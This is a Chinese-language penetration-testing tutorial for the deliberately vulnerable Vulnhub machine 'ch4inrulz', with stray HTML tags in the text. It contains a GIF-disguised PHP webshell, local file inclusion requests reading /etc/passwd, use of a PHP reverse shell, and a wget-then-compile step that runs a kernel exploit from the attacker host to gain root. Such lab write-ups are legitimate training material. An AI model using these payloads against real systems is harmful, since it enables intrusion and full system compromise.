Vulnhub靶机"ch4inrulz"渗透测试教学文档<\/h1>

环境准备<\/h2>

靶机环境<\/strong>: 192.168.107.128 (ch4inrulz)<\/li>
攻击机<\/strong>: Kali Linux 192.168.107.129<\/li>

网络配置<\/strong>: 同一局域网段<\/li> <\/ul>
信息收集阶段<\/h2>
1. 主机发现<\/h3>
使用nmap进行主机发现:<\/p>
nmap -sP 192.168.107.1\/24 <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 对靶机进行详细扫描:<\/p> nmap -sS -A 192.168.107.128 <\/span><\/span><\/code><\/pre>扫描结果<\/strong>:<\/p> 21\/tcp: FTP<\/li> 22\/tcp: SSH<\/li> 80\/tcp: HTTP<\/li> 8011\/tcp: 未知服务<\/li> <\/ul> Web服务渗透<\/h2> 1. 目录扫描<\/h3> 使用工具扫描Web目录:<\/p> dirb http:\/\/192.168.107.128 <\/span><\/span><\/code><\/pre>发现重要文件<\/strong>:<\/p> \/robots.txt<\/code> (无有用信息)<\/li> \/index.html.bak<\/code> (备份文件)<\/li> <\/ul> 2. 分析备份文件<\/h3> 下载并分析index.html.bak<\/code>，发现:<\/p> 存在\/development<\/code>目录<\/li> 包含疑似用户名密码的哈希字符串<\/li> <\/ul> 3. 破解密码<\/h3> 使用John the Ripper破解哈希:<\/p> john <hash_file> <\/span><\/span><\/code><\/pre>破解结果<\/strong>: 密码为frank!!!<\/code><\/p> FTP服务检查<\/h2> 检查FTP服务(21端口):<\/p> ftp 192.168.107.128 <\/span><\/span><\/code><\/pre>未发现有用信息。<\/p> 8011端口利用<\/h2> 1. 目录扫描<\/h3> 扫描8011端口服务:<\/p> dirb http:\/\/192.168.107.128:8011 <\/span><\/span><\/code><\/pre>发现\/api\/<\/code>目录，包含:<\/p> files_api.php<\/code> (可访问)<\/li> 其他API返回404<\/li> <\/ul> 2. 文件包含漏洞<\/h3> 尝试GET方式读取文件失败，改用POST方式:<\/p> curl -X POST -d "file=\/etc\/passwd"<\/span> http:\/\/192.168.107.128:8011\/api\/files_api.php <\/span><\/span><\/code><\/pre>成功读取系统文件。<\/p> 获取WebShell<\/h2> 1. 登录开发后台<\/h3> 使用破解的凭据登录\/development<\/code>:<\/p> 用户名: frank<\/code><\/li> 密码: frank!!!<\/code><\/li> <\/ul> 2. 文件上传漏洞<\/h3> 发现上传功能在\/uploader<\/code>目录:<\/p> 上传GIF文件测试，确认上传路径为\/FRANKuploads<\/code><\/li> 尝试上传PHP文件被拦截<\/li> 上传含PHP代码的GIF文件:<\/li> <\/ol> GIF89a<\/span> <\/span><\/span><?<\/span>php<\/span> system<\/span>($_GET['cmd'<\/span>]); ?><\/span> <\/span><\/span><\/span><\/code><\/pre>3. 结合文件包含执行代码<\/h3> 通过文件包含执行上传的WebShell:<\/p> curl http:\/\/192.168.107.128:8011\/api\/files_api.php -X POST -d "file=\/var\/www\/html\/FRANKuploads\/shell.gif"<\/span> <\/span><\/span><\/code><\/pre>4. 获取反向Shell<\/h3> 使用Kali自带的PHP反向Shell脚本:<\/p> cp \/usr\/share\/webshells\/php\/php-reverse-shell.php . <\/span><\/span><\/code><\/pre>修改IP为攻击机IP，上传后执行获取Shell。<\/p> 权限提升<\/h2> 1. 改善Shell环境<\/h3> 获取基本Shell后，升级为交互式Shell:<\/p> python -c 'import pty; pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre>2. 内核漏洞提权<\/h3> 检查系统版本:<\/p> uname -a <\/span><\/span><\/code><\/pre>搜索对应漏洞，使用本地提权EXP:<\/p> 在Kali搭建Web服务:<\/li> <\/ol> python -m SimpleHTTPServer 80<\/span> <\/span><\/span><\/code><\/pre> 靶机下载EXP:<\/li> <\/ol> wget http:\/\/192.168.107.129\/exploit.c -O \/tmp\/exploit.c <\/span><\/span><\/code><\/pre> 编译执行:<\/li> <\/ol> gcc \/tmp\/exploit.c -o \/tmp\/exploit <\/span><\/span>chmod +x \/tmp\/exploit <\/span><\/span>\/tmp\/exploit <\/span><\/span><\/code><\/pre>成功获取root权限。<\/p> 总结<\/h2> 本渗透测试过程涉及:<\/p> 基础信息收集(nmap扫描)<\/li> Web目录枚举和备份文件分析<\/li> 密码破解(John the Ripper)<\/li> 文件包含漏洞利用<\/li> 文件上传绕过技术<\/li> WebShell获取与反向Shell建立<\/li> 内核漏洞本地提权<\/li> <\/ol> 关键点在于发现并组合利用文件包含和文件上传漏洞，以及最后的本地提权技术。<\/p>